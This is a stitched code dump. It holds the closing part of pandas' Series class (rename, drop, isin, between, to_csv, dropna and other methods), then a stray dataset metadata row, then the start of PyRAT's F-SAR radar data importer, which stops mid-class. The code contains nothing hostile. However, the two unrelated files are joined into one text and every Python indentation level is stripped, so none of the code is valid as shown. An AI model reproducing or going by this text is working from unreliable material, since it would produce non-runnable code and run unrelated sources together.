# TODO: remove hasattr check after TimedeltaIndex has `std` method
delegate = TimedeltaIndex(delegate)
# dispatch to numpy arrays
elif isinstance(delegate, np.ndarray):
if numeric_only:
raise NotImplementedError(
"Series.{0} does not implement " "numeric_only.".format(name)
)
with np.errstate(all="ignore"):
return op(delegate, skipna=skipna, **kwds)
# TODO(EA) dispatch to Index
# remove once all internals extension types are
# moved to ExtensionArrays
return delegate._reduce(
op=op,
name=name,
axis=axis,
skipna=skipna,
numeric_only=numeric_only,
filter_type=filter_type,
**kwds
)
def _reindex_indexer(self, new_index, indexer, copy):
if indexer is None:
if copy:
return self.copy()
return self
new_values = algorithms.take_1d(
self._values, indexer, allow_fill=True, fill_value=None
)
return self._constructor(new_values, index=new_index)
def _needs_reindex_multi(self, axes, method, level):
"""
Check if we do need a multi reindex; this is for compat with
higher dims.
"""
return False
@Appender(generic._shared_docs["align"] % _shared_doc_kwargs)
def align(
self,
other,
join="outer",
axis=None,
level=None,
copy=True,
fill_value=None,
method=None,
limit=None,
fill_axis=0,
broadcast_axis=None,
):
return super().align(
other,
join=join,
axis=axis,
level=level,
copy=copy,
fill_value=fill_value,
method=method,
limit=limit,
fill_axis=fill_axis,
broadcast_axis=broadcast_axis,
)
def rename(self, index=None, **kwargs):
"""
Alter Series index labels or name.
Function / dict values must be unique (1-to-1). Labels not contained in
a dict / Series will be left as-is. Extra labels listed don't throw an
error.
Alternatively, change ``Series.name`` with a scalar value.
See the :ref:`user guide <basics.rename>` for more.
Parameters
----------
index : scalar, hashable sequence, dict-like or function, optional
dict-like or functions are transformations to apply to
the index.
Scalar or hashable sequence-like will alter the ``Series.name``
attribute.
copy : bool, default True
Whether to copy underlying data.
inplace : bool, default False
Whether to return a new Series. If True then value of copy is
ignored.
level : int or level name, default None
In case of a MultiIndex, only rename labels in the specified
level.
Returns
-------
Series
Series with index labels or name altered.
See Also
--------
Series.rename_axis : Set the name of the axis.
Examples
--------
>>> s = pd.Series([1, 2, 3])
>>> s
0 1
1 2
2 3
dtype: int64
>>> s.rename("my_name") # scalar, changes Series.name
0 1
1 2
2 3
Name: my_name, dtype: int64
>>> s.rename(lambda x: x ** 2) # function, changes labels
0 1
1 2
4 3
dtype: int64
>>> s.rename({1: 3, 2: 5}) # mapping, changes labels
0 1
3 2
5 3
dtype: int64
"""
kwargs["inplace"] = validate_bool_kwarg(kwargs.get("inplace", False), "inplace")
if callable(index) or is_dict_like(index):
return super().rename(index=index, **kwargs)
else:
return self._set_name(index, inplace=kwargs.get("inplace"))
@Substitution(**_shared_doc_kwargs)
@Appender(generic.NDFrame.reindex.__doc__)
def reindex(self, index=None, **kwargs):
return super().reindex(index=index, **kwargs)
def drop(
self,
labels=None,
axis=0,
index=None,
columns=None,
level=None,
inplace=False,
errors="raise",
):
"""
Return Series with specified index labels removed.
Remove elements of a Series based on specifying the index labels.
When using a multi-index, labels on different levels can be removed
by specifying the level.
Parameters
----------
labels : single label or list-like
Index labels to drop.
axis : 0, default 0
Redundant for application on Series.
index, columns : None
Redundant for application on Series, but index can be used instead
of labels.
.. versionadded:: 0.21.0
level : int or level name, optional
For MultiIndex, level for which the labels will be removed.
inplace : bool, default False
If True, do operation inplace and return None.
errors : {'ignore', 'raise'}, default 'raise'
If 'ignore', suppress error and only existing labels are dropped.
Returns
-------
Series
Series with specified index labels removed.
Raises
------
KeyError
If none of the labels are found in the index.
See Also
--------
Series.reindex : Return only specified index labels of Series.
Series.dropna : Return series without null values.
Series.drop_duplicates : Return Series with duplicate values removed.
DataFrame.drop : Drop specified labels from rows or columns.
Examples
--------
>>> s = pd.Series(data=np.arange(3), index=['A', 'B', 'C'])
>>> s
A 0
B 1
C 2
dtype: int64
Drop labels B en C
>>> s.drop(labels=['B', 'C'])
A 0
dtype: int64
Drop 2nd level label in MultiIndex Series
>>> midx = pd.MultiIndex(levels=[['lama', 'cow', 'falcon'],
... ['speed', 'weight', 'length']],
... codes=[[0, 0, 0, 1, 1, 1, 2, 2, 2],
... [0, 1, 2, 0, 1, 2, 0, 1, 2]])
>>> s = pd.Series([45, 200, 1.2, 30, 250, 1.5, 320, 1, 0.3],
... index=midx)
>>> s
lama speed 45.0
weight 200.0
length 1.2
cow speed 30.0
weight 250.0
length 1.5
falcon speed 320.0
weight 1.0
length 0.3
dtype: float64
>>> s.drop(labels='weight', level=1)
lama speed 45.0
length 1.2
cow speed 30.0
length 1.5
falcon speed 320.0
length 0.3
dtype: float64
"""
return super().drop(
labels=labels,
axis=axis,
index=index,
columns=columns,
level=level,
inplace=inplace,
errors=errors,
)
@Substitution(**_shared_doc_kwargs)
@Appender(generic.NDFrame.fillna.__doc__)
def fillna(
self,
value=None,
method=None,
axis=None,
inplace=False,
limit=None,
downcast=None,
**kwargs
):
return super().fillna(
value=value,
method=method,
axis=axis,
inplace=inplace,
limit=limit,
downcast=downcast,
**kwargs
)
@Appender(generic._shared_docs["replace"] % _shared_doc_kwargs)
def replace(
self,
to_replace=None,
value=None,
inplace=False,
limit=None,
regex=False,
method="pad",
):
return super().replace(
to_replace=to_replace,
value=value,
inplace=inplace,
limit=limit,
regex=regex,
method=method,
)
@Appender(generic._shared_docs["shift"] % _shared_doc_kwargs)
def shift(self, periods=1, freq=None, axis=0, fill_value=None):
return super().shift(
periods=periods, freq=freq, axis=axis, fill_value=fill_value
)
def memory_usage(self, index=True, deep=False):
"""
Return the memory usage of the Series.
The memory usage can optionally include the contribution of
the index and of elements of `object` dtype.
Parameters
----------
index : bool, default True
Specifies whether to include the memory usage of the Series index.
deep : bool, default False
If True, introspect the data deeply by interrogating
`object` dtypes for system-level memory consumption, and include
it in the returned value.
Returns
-------
int
Bytes of memory consumed.
See Also
--------
numpy.ndarray.nbytes : Total bytes consumed by the elements of the
array.
DataFrame.memory_usage : Bytes consumed by a DataFrame.
Examples
--------
>>> s = pd.Series(range(3))
>>> s.memory_usage()
152
Not including the index gives the size of the rest of the data, which
is necessarily smaller:
>>> s.memory_usage(index=False)
24
The memory footprint of `object` values is ignored by default:
>>> s = pd.Series(["a", "b"])
>>> s.values
array(['a', 'b'], dtype=object)
>>> s.memory_usage()
144
>>> s.memory_usage(deep=True)
260
"""
v = super().memory_usage(deep=deep)
if index:
v += self.index.memory_usage(deep=deep)
return v
@Appender(generic.NDFrame.take.__doc__)
def take(self, indices, axis=0, is_copy=False, **kwargs):
nv.validate_take(tuple(), kwargs)
indices = ensure_platform_int(indices)
new_index = self.index.take(indices)
if is_categorical_dtype(self):
# https://github.com/pandas-dev/pandas/issues/20664
# TODO: remove when the default Categorical.take behavior changes
indices = maybe_convert_indices(indices, len(self._get_axis(axis)))
kwargs = {"allow_fill": False}
else:
kwargs = {}
new_values = self._values.take(indices, **kwargs)
result = self._constructor(
new_values, index=new_index, fastpath=True
).__finalize__(self)
# Maybe set copy if we didn't actually change the index.
if is_copy:
if not result._get_axis(axis).equals(self._get_axis(axis)):
result._set_is_copy(self)
return result
def isin(self, values):
"""
Check whether `values` are contained in Series.
Return a boolean Series showing whether each element in the Series
matches an element in the passed sequence of `values` exactly.
Parameters
----------
values : set or list-like
The sequence of values to test. Passing in a single string will
raise a ``TypeError``. Instead, turn a single string into a
list of one element.
.. versionadded:: 0.18.1
Support for values as a set.
Returns
-------
Series
Series of booleans indicating if each element is in values.
Raises
------
TypeError
* If `values` is a string
See Also
--------
DataFrame.isin : Equivalent method on DataFrame.
Examples
--------
>>> s = pd.Series(['lama', 'cow', 'lama', 'beetle', 'lama',
... 'hippo'], name='animal')
>>> s.isin(['cow', 'lama'])
0 True
1 True
2 True
3 False
4 True
5 False
Name: animal, dtype: bool
Passing a single string as ``s.isin('lama')`` will raise an error. Use
a list of one element instead:
>>> s.isin(['lama'])
0 True
1 False
2 True
3 False
4 True
5 False
Name: animal, dtype: bool
"""
result = algorithms.isin(self, values)
return self._constructor(result, index=self.index).__finalize__(self)
def between(self, left, right, inclusive=True):
"""
Return boolean Series equivalent to left <= series <= right.
This function returns a boolean vector containing `True` wherever the
corresponding Series element is between the boundary values `left` and
`right`. NA values are treated as `False`.
Parameters
----------
left : scalar
Left boundary.
right : scalar
Right boundary.
inclusive : bool, default True
Include boundaries.
Returns
-------
Series
Series representing whether each element is between left and
right (inclusive).
See Also
--------
Series.gt : Greater than of series and other.
Series.lt : Less than of series and other.
Notes
-----
This function is equivalent to ``(left <= ser) & (ser <= right)``
Examples
--------
>>> s = pd.Series([2, 0, 4, 8, np.nan])
Boundary values are included by default:
>>> s.between(1, 4)
0 True
1 False
2 True
3 False
4 False
dtype: bool
With `inclusive` set to ``False`` boundary values are excluded:
>>> s.between(1, 4, inclusive=False)
0 True
1 False
2 False
3 False
4 False
dtype: bool
`left` and `right` can be any scalar value:
>>> s = pd.Series(['Alice', 'Bob', 'Carol', 'Eve'])
>>> s.between('Anna', 'Daniel')
0 False
1 True
2 True
3 False
dtype: bool
"""
if inclusive:
lmask = self >= left
rmask = self <= right
else:
lmask = self > left
rmask = self < right
return lmask & rmask
@Appender(generic.NDFrame.to_csv.__doc__)
def to_csv(self, *args, **kwargs):
names = [
"path_or_buf",
"sep",
"na_rep",
"float_format",
"columns",
"header",
"index",
"index_label",
"mode",
"encoding",
"compression",
"quoting",
"quotechar",
"line_terminator",
"chunksize",
"date_format",
"doublequote",
"escapechar",
"decimal",
]
old_names = [
"path_or_buf",
"index",
"sep",
"na_rep",
"float_format",
"header",
"index_label",
"mode",
"encoding",
"compression",
"date_format",
"decimal",
]
if "path" in kwargs:
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`, and argument "
"'path' will be renamed to 'path_or_buf'.",
FutureWarning,
stacklevel=2,
)
kwargs["path_or_buf"] = kwargs.pop("path")
if len(args) > 1:
# Either "index" (old signature) or "sep" (new signature) is being
# passed as second argument (while the first is the same)
maybe_sep = args[1]
if not (is_string_like(maybe_sep) and len(maybe_sep) == 1):
# old signature
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`. Note that the "
"order of arguments changed, and the new one "
"has 'sep' in first place, for which \"{}\" is "
"not a valid value. The old order will cease to "
"be supported in a future version. Please refer "
"to the documentation for `DataFrame.to_csv` "
"when updating your function "
"calls.".format(maybe_sep),
FutureWarning,
stacklevel=2,
)
names = old_names
pos_args = dict(zip(names[: len(args)], args))
for key in pos_args:
if key in kwargs:
raise ValueError(
"Argument given by name ('{}') and position "
"({})".format(key, names.index(key))
)
kwargs[key] = pos_args[key]
if kwargs.get("header", None) is None:
warnings.warn(
"The signature of `Series.to_csv` was aligned "
"to that of `DataFrame.to_csv`, and argument "
"'header' will change its default value from False "
"to True: please pass an explicit value to suppress "
"this warning.",
FutureWarning,
stacklevel=2,
)
kwargs["header"] = False # Backwards compatibility.
return self.to_frame().to_csv(**kwargs)
@Appender(generic._shared_docs["isna"] % _shared_doc_kwargs)
def isna(self):
return super().isna()
@Appender(generic._shared_docs["isna"] % _shared_doc_kwargs)
def isnull(self):
return super().isnull()
@Appender(generic._shared_docs["notna"] % _shared_doc_kwargs)
def notna(self):
return super().notna()
@Appender(generic._shared_docs["notna"] % _shared_doc_kwargs)
def notnull(self):
return super().notnull()
def dropna(self, axis=0, inplace=False, **kwargs):
"""
Return a new Series with missing values removed.
See the :ref:`User Guide <missing_data>` for more on which values are
considered missing, and how to work with missing data.
Parameters
----------
axis : {0 or 'index'}, default 0
There is only one axis to drop values from.
inplace : bool, default False
If True, do operation inplace and return None.
**kwargs
Not in use.
Returns
-------
Series
Series with NA entries dropped from it.
See Also
--------
Series.isna: Indicate missing values.
Series.notna : Indicate existing (non-missing) values.
Series.fillna : Replace missing values.
DataFrame.dropna : Drop rows or columns which contain NA values.
Index.dropna : Drop missing indices.
Examples
--------
>>> ser = pd.Series([1., 2., np.nan])
>>> ser
0 1.0
1 2.0
2 NaN
dtype: float64
Drop NA values from a Series.
>>> ser.dropna()
0 1.0
1 2.0
dtype: float64
Keep the Series with valid entries in the same variable.
>>> ser.dropna(inplace=True)
>>> ser
0 1.0
1 2.0
dtype: float64
Empty strings are not considered NA values. ``None`` is considered an
NA value.
>>> ser = pd.Series([np.NaN, 2, pd.NaT, '', None, 'I stay'])
>>> ser
0 NaN
1 2
2 NaT
3
4 None
5 I stay
dtype: object
>>> ser.dropna()
1 2
3
5 I stay
dtype: object
"""
inplace = validate_bool_kwarg(inplace, "inplace")
kwargs.pop("how", None)
if kwargs:
raise TypeError(
"dropna() got an unexpected keyword "
'argument "{0}"'.format(list(kwargs.keys())[0])
)
# Validate the axis parameter
self._get_axis_number(axis or 0)
if self._can_hold_na:
result = remove_na_arraylike(self)
if inplace:
self._update_inplace(result)
else:
return result
else:
if inplace:
# do nothing
pass
else:
return self.copy()
def valid(self, inplace=False, **kwargs):
"""
Return Series without null values.
.. deprecated:: 0.23.0
Use :meth:`Series.dropna` instead.
Returns
-------
Series
Series without null values.
"""
warnings.warn(
"Method .valid will be removed in a future version. "
"Use .dropna instead.",
FutureWarning,
stacklevel=2,
)
return self.dropna(inplace=inplace, **kwargs)
# ----------------------------------------------------------------------
# Time series-oriented methods
def to_timestamp(self, freq=None, how="start", copy=True):
"""
Cast to DatetimeIndex of Timestamps, at *beginning* of period.
Parameters
----------
freq : str, default frequency of PeriodIndex
Desired frequency.
how : {'s', 'e', 'start', 'end'}
Convention for converting period to timestamp; start of period
vs. end.
copy : bool, default True
Whether or not to return a copy.
Returns
-------
Series with DatetimeIndex
"""
new_values = self._values
if copy:
new_values = new_values.copy()
new_index = self.index.to_timestamp(freq=freq, how=how)
return self._constructor(new_values, index=new_index).__finalize__(self)
def to_period(self, freq=None, copy=True):
"""
Convert Series from DatetimeIndex to PeriodIndex with desired
frequency (inferred from index if not passed).
Parameters
----------
freq : str, default None
Frequency associated with the PeriodIndex.
copy : bool, default True
Whether or not to return a copy.
Returns
-------
Series
Series with index converted to PeriodIndex.
"""
new_values = self._values
if copy:
new_values = new_values.copy()
new_index = self.index.to_period(freq=freq)
return self._constructor(new_values, index=new_index).__finalize__(self)
# ----------------------------------------------------------------------
# Accessor Methods
# ----------------------------------------------------------------------
str = CachedAccessor("str", StringMethods)
dt = CachedAccessor("dt", CombinedDatetimelikeProperties)
cat = CachedAccessor("cat", CategoricalAccessor)
plot = CachedAccessor("plot", pandas.plotting.PlotAccessor)
sparse = CachedAccessor("sparse", SparseAccessor)
# ----------------------------------------------------------------------
# Add plotting methods to Series
hist = pandas.plotting.hist_series
Series._setup_axes(
["index"],
info_axis=0,
stat_axis=0,
aliases={"rows": 0},
docs={"index": "The index (axis labels) of the Series."},
)
Series._add_numeric_operations()
Series._add_series_only_operations()
Series._add_series_or_dataframe_operations()
# Add arithmetic!
ops.add_flex_arithmetic_methods(Series)
ops.add_special_arithmetic_methods(Series)
| apache-2.0 | -3,893,275,183,218,865,000 | 29.795547 | 88 | 0.51797 | false |
birgander2/PyRAT | pyrat/load/FSAR.py | 1 | 29089 | import pyrat
import glob, os
import logging
import copy
import numpy as np
from PyQt5 import QtCore, QtWidgets
# from pyrat.load import RatFile
from pyrat.lib.ste import RatFile, Xml2Py
from pyrat.viewer.Dialogs import FlexFilesel
from pyrat.viewer.Widgets import HLine, CropBoxWidget, BoolWidget, FileselWidget, ProductContentWidget
class FSAR(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product. This class loads the SLC data of one or several bands and / or one
or several polarisations, together with their meta data into a new PyRAT layer(s).
:param dir: The F-SAR product directory.
:type dir: str
:param bands: Load only this band. '*' to load all bands. Default='*'
:type band: string
:param polarisations: Load only this polarisation. '*' to load all bands. Default='*'
:type polarisation: string
:param product: Selects the product component to import. Default='RGI-SLC'
:type product: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:param sym: PolSAR symmetrisation. If set, HV and VH are averaged on import. Default=False
:type sym: bool
:author: Andreas Reigber
"""
gui = {'menu': 'File|Import airborne', 'entry': 'F-SAR'}
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'suffix', 'value': ''},
{'var': 'crop', 'value': [0, 0, 0, 0]},
{'var': 'sym', 'value': False, 'type': 'bool', 'text': 'Cross-polar symmetrisation'},
{'var': 'mask', 'type': bool, 'value': False}]
def __init__(self, *args, **kwargs):
super(FSAR, self).__init__(*args, **kwargs)
self.name = "FSAR SLC IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
if self.product == 'RGI-SLC':
head = 'slc'
src = ('RGI', 'RGI-SR')
if self.product == 'RGI-AMP':
head = 'amp'
src = ('RGI', 'RGI-SR')
if self.product == 'INF-SLC':
head = 'slc_coreg_offset'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
if self.product == 'INF-CIR':
head = 'slcpol'
src = ('INF', 'INF-SR')
if self.polarisations == '*':
self.polarisations = '??'
if self.product == 'INF-CIR':
files = glob.glob(os.path.join(self.dir, src[0], src[1],
head + '*' + self.bands.upper() + self.polarisations.lower() + '*_c' + str(
self.track) + '_s' + str(self.subaperture) + '_*coreg.rat'))
else:
files = glob.glob(os.path.join(self.dir, src[0], src[1],
head + '*' + self.bands.upper() + self.polarisations.lower() + '_*.rat'))
if self.product == 'INF-SLC':
if len(files) is 0:
head = 'slc_coreg'
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper()
+ self.polarisations.lower() + '_*.rat'))
bands = list(set([os.path.basename(slc).split('_')[-2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[-2][1:3] for slc in files]))
if self.product != 'INF-SLC':
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
if self.mask is True:
maskfile = glob.glob(os.path.join(self.dir, src[0], src[1], 'mask*' + band.upper() + '*.rat'))
msk = RatFile(maskfile[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0 or block[1] > naz:
block[1] = naz
if block[3] == 0 or block[3] > nrg:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='complex64')
bmeta = {}
bmeta['sensor'] = 'DLR F-SAR'
bmeta['band'] = band
bmeta['CH_pol'] = [' '] * len(bandfiles)
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
if self.mask is True:
mask = msk.read(block=block)
# barr[k, ...] *= mask
if self.product == 'RGI-SLC':
ppfile = f.replace('RGI-SR', 'RGI-RDP').replace('slc_', 'pp_').replace('.rat', '.xml')
if self.product == 'RGI-AMP':
ppfile = f.replace('RGI-SR', 'RGI-RDP').replace('amp_', 'pp_').replace('.rat', '.xml')
if self.product == 'INF-SLC':
ppname = 'pp_' + '_'.join(os.path.basename(f).split('_')[-3:]).replace('.rat', '.xml')
ppfile = os.path.join(self.dir, src[0], 'INF-RDP', ppname)
if self.product == 'INF-CIR':
ppname = 'ppgeo_csar_' + '_'.join(os.path.basename(f).split('_')[1:4]) + '.xml'
ppfile = os.path.join(self.dir, 'GTC', 'GTC-RDP', ppname)
pp = Xml2Py(ppfile)
bmeta['CH_pol'][k] = pp.polarisation
if self.sym is True and barr.ndim == 3 and barr.shape[0] == 4:
pol = bmeta['CH_pol']
idx_hh = pol.index('HH')
idx_vv = pol.index('VV')
idx_hv = pol.index('HV')
idx_vh = pol.index('VH')
barr[idx_hv, ...] = (barr[idx_hv, ...] + barr[idx_vh, ...]) / np.sqrt(2)
barr = np.delete(barr, idx_vh, axis=0)
bmeta['CH_pol'][idx_hv] = 'XX'
bmeta['CH_pol'].remove('VH')
bmeta['prf'] = pp.prf
bmeta['c0'] = pp.c0
bmeta['rd'] = pp.rd
bmeta['rsf'] = pp.rsf
bmeta['nrg'] = drg
bmeta['naz'] = daz
bmeta['lam'] = pp['lambda']
bmeta['band'] = pp.band
bmeta['antdir'] = pp.antdir
bmeta['v0'] = pp.v0
bmeta['bw'] = pp.cbw
bmeta['ps_rg'] = pp.ps_rg
bmeta['ps_az'] = pp.ps_az
bmeta['rd'] += block[2] / bmeta['rsf']
bmeta['h0'] = pp.h0
bmeta['pre_az'] = pp.pre_az
bmeta['terrain'] = pp.terrain
if self.mask is True:
array.append([barr, mask])
else:
array.append(barr)
meta.append(bmeta)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@classmethod
def guirun(cls, viewer):
para_backup = copy.deepcopy(cls.para) # keep a deep copy of the default parameters
wid = FsarImportWidget()
wid.update()
res = wid.exec_()
if res == 1:
plugin = cls(dir=wid.dir, product=wid.product, bands=wid.bands, polarisations=wid.polar, crop=wid.crop, sym=wid.sym)
viewer.statusBar.setMessage(message=plugin.name + ' running', colour='R')
plugin.run()
del plugin
viewer.statusBar.setMessage(message='Ready', colour='G')
viewer.updateViewer()
class FsarImportWidget(QtWidgets.QDialog):
def __init__(self, parent=None, dir=None):
super(FsarImportWidget, self).__init__(parent)
self.setWindowTitle("FSAR import")
mainlayout = QtWidgets.QVBoxLayout(self)
self.dirwidget = FileselWidget(title='FSAR product dir', type='opendir')
self.dirwidget.setvalue(dir)
mainlayout.addWidget(self.dirwidget)
mainlayout.addWidget(HLine())
self.productwidget = ProductContentWidget(products=["RGI-SLC", "RGI-AMP", "INF-SLC"])
mainlayout.addWidget(self.productwidget)
mainlayout.addWidget(HLine())
self.cropwidget = CropBoxWidget(title='Select crop (0=maximum)')
mainlayout.addWidget(self.cropwidget)
mainlayout.addWidget(HLine())
self.symwidget = BoolWidget(text="Cross-polar symmetrisation")
mainlayout.addWidget(self.symwidget)
self.buttons = QtWidgets.QDialogButtonBox(QtWidgets.QDialogButtonBox.Ok | QtWidgets.QDialogButtonBox.Cancel,
QtCore.Qt.Horizontal, self)
mainlayout.addWidget(self.buttons)
self.buttons.accepted.connect(self.accept)
self.buttons.rejected.connect(self.reject)
self.dirwidget.text.textChanged.connect(lambda: self.update(mode=0)) # update all
self.bandupdate = lambda: self.update(mode=2) # update band
self.productwidget.product.currentIndexChanged.connect(lambda: self.update(mode=1)) # update product
self.productwidget.band.currentIndexChanged.connect(self.bandupdate)
def update(self, mode=0):
self.dir = str(self.dirwidget.getvalue())
self.product = self.productwidget.getvalue(0)
self.bands = self.productwidget.getvalue(1)
self.polar = self.productwidget.getvalue(2)
if self.product == 'RGI-SLC':
head = 'slc'
src = ('RGI', 'RGI-SR')
code_pos = 2
if self.product == 'RGI-AMP':
head = 'amp'
src = ('RGI', 'RGI-SR')
code_pos = 2
if self.product == 'INF-SLC':
head = 'slc_coreg'
src = ('INF', 'INF-SR')
code_pos = 4
files = glob.glob(
os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + self.polar.lower() + '*.rat'))
if mode == 0:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*.rat'))
self.bands = '*'
self.polar = '*'
if mode == 1:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*.rat'))
if mode == 2:
allfiles = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
# allfiles = glob.glob(os.path.join(self.dir,'RGI','RGI-SR',head+'*.rat'))
allbands = list(set([os.path.basename(slc).split('_')[code_pos][0] for slc in allfiles]))
allpols = list(set([os.path.basename(slc).split('_')[code_pos][1:3].upper() for slc in allfiles]))
nrg = 0
naz = 0
for filename in files:
lun = RatFile(filename)
nrg = max(nrg, lun.shape[1])
naz = max(naz, lun.shape[0])
self.cropwidget.setrange([[0, naz], [0, naz], [0, nrg], [0, nrg]])
self.cropwidget.setvalues([0, naz, 0, nrg])
if mode == 0 or mode == 1:
self.productwidget.band.currentIndexChanged.disconnect(self.bandupdate)
self.productwidget.updatepolar(allpols)
self.productwidget.updatebands(allbands)
self.productwidget.setvalue(1, self.bands)
self.productwidget.setvalue(2, self.polar)
self.productwidget.band.currentIndexChanged.connect(self.bandupdate)
elif mode == 2:
self.productwidget.updatepolar(allpols)
self.productwidget.setvalue(2, self.polar)
def accept(self):
self.product = self.productwidget.getvalue(0)
self.bands = self.productwidget.getvalue(1)
self.polar = self.productwidget.getvalue(2)
self.crop = self.cropwidget.getvalues()
self.sym = self.symwidget.getvalue()
super(FsarImportWidget, self).accept()
@pyrat.docstringfrom(FSAR)
def fsar(*args, **kwargs):
return FSAR(*args, **kwargs).run(*args, **kwargs)
class FSAR_dem(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_dem, self).__init__(*args, **kwargs)
self.name = "FSAR DEM IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'slantdem_full'
src = ('RGI', 'RGI-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(barr)
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_dem)
def fsar_dem(*args, **kwargs):
return FSAR_dem(*args, **kwargs).run(*args, **kwargs)
class FSAR_offnadir(pyrat.ImportWorker):
"""
Import of DLR F-SAR SLC product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'polarisations', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_offnadir, self).__init__(*args, **kwargs)
self.name = "FSAR OFFNADIR IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'offnadir'
src = ('RGI', 'RGI-AUX')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
pols = list(set([os.path.basename(slc).split('_')[2][1:3] for slc in files]))
array = []
meta = []
meta.append({})
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
fil = RatFile(bandfiles[0])
naz = fil.shape[0]
nrg = fil.shape[1]
block = list(self.crop)
if block[1] == 0:
block[1] = naz
if block[3] == 0:
block[3] = nrg
daz = block[1] - block[0]
drg = block[3] - block[2]
barr = np.empty((len(bandfiles), daz, drg), dtype='float32')
for k, f in enumerate(bandfiles):
logging.info("Found " + f)
barr[k, ...] = RatFile(f).read(block=block)
array.append(np.squeeze(barr))
if len(array) == 0:
return None, None
elif len(array) == 1:
return array[0], meta[0]
else:
return array, meta
@pyrat.docstringfrom(FSAR_offnadir)
def fsar_offnadir(*args, **kwargs):
return FSAR_offnadir(*args, **kwargs).run(*args, **kwargs)
class FSAR_phadem(pyrat.ImportWorker):
"""
Import of DLR F-SAR DEM PHASE product
:param dir: The F-SAR product directory.
:type dir: str
:param match: A matching string to select subset of files
:type match: string
:param suffix: An optional suffix appended to the INF directory (i.e. INF_<suffix>)
:type suffix: string
:param crop: A crop region / subset to import (az_start, az_end, rg_start, rg_end)
:type crop: tuple
:author: Andreas Reigber
"""
para = [
{'var': 'dir', 'value': ''},
{'var': 'bands', 'value': '*'},
{'var': 'product', 'value': 'RGI-SLC'},
{'var': 'suffix', 'value': ''},
{'var': 'crop', 'value': [0, 0, 0, 0]}
]
def __init__(self, *args, **kwargs):
super(FSAR_phadem, self).__init__(*args, **kwargs)
self.name = "FSAR DEM PHASE IMPORT"
if len(args) == 1:
self.dir = args[0]
def reader(self, *args, **kwargs):
head = 'pha_dem'
src = ('INF' + ('_' + self.suffix if len(self.suffix) > 0 else ''), 'INF-SR')
files = glob.glob(os.path.join(self.dir, src[0], src[1], head + '*' + self.bands.upper() + '*.rat'))
bands = list(set([os.path.basename(slc).split('_')[2][0] for slc in files]))
array = []
meta = [{}]
for band in bands:
if hasattr(self, 'band') and band not in self.band:
logging.warning(band + '-band data not found in specified directory')
else:
bandfiles = [f for f in files if '_' + band in f]
